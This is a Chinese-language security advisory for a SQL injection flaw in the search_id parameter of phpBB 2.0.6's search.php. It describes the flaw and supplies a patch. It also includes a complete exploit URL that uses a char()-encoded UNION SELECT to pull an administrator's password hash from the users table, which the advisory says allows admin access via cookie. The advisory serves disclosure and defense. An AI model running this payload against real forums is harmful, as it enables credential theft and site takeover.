添加时间:
2005-08-16

系统编号:
WAVDB-00382
BugCVE: CAN-2003-1216
BUGTRAQ: 9122

影响版本:
phpBB 2.0.6

程序介绍:

phpBB2是一款由PHP编写的WEB论坛应用程序，支持多种数据库系统，可使用在多种Unix和Linux操作系统下。

漏洞分析:

phpBB2包含的search.php对用户提交的参数缺少充分过滤，远程攻击者可以利用这个漏洞进行SQL注入攻击，可以获得系统敏感信息。

问题是search.php脚本对 search_id 参数缺少充分过滤，攻击者可以提交包含恶意SQL命令给这个参数，可导致修改原有的SQL逻辑，获得数据库信息或修改数据库。经过测试，可利用此漏洞获得管理员密码HASH信息，并修改COOKIE信息以管理员权限访问系统。

漏洞利用:

http://site.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enteruid]/*

解决方案:
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 打开search.php脚本，查找如下代码：
if ( intval($search_id) )
{
$sql = SELECT search_array
FROM . SEARCH_TABLE .
WHERE search_id = $search_id
AND session_id = ' . $userdata['session_id'] . ' ;
并使用如下代码代替如上代码：
$search_id = intval($search_id);
if ( $search_id )
{
$sql = SELECT search_array
FROM . SEARCH_TABLE .
WHERE search_id = $search_id
AND session_id = ' . $userdata['session_id'] . ' ;

厂商补丁：
phpBB Group
-----------
下载最新的2.06版本：
http://www.phpbb.com

信息来源:
<*来源：Niels Teusink （n.teusink@planet.nl）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106997132425576&w=2 *>